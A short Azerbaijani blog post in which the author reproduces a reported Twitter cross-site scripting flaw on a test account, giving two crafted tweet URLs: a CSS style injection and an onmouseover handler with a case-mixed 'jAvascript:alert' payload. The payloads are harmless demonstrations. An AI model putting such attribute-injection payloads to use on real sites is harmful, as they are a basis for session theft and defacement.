Bu gün RSS-dən izlədiyim saytlardan birində, Twitter-in XSS açıqları barədə oxudum və mən də sınayım dedim. Həqiqətən də işləyir. Mən də LabrinTest deyə bir username açıb onun üstündə test elədim.
Əvvəla CSS-lə rənglər vermək olur. Məntiqi budur ki, backgrounda və fonta eyni color verdikdə, sadəcə rəng tvitləmiş oluruq:

http://twitter.com/LabrinTest#@"style="background-color:red;color:red;position:absolute;top:0;left:0;width:100%;height:100%"/

Digər bir test isə, JavaScripdit. Burada da zərərsiz bəsit bir kod istifadə edirik:

http://twitter.com/LabrinTest#@"onmouseover="jAvascript:alert('XSS error verir!');"/

https://twitter.com/LabrinTest/status/25112947015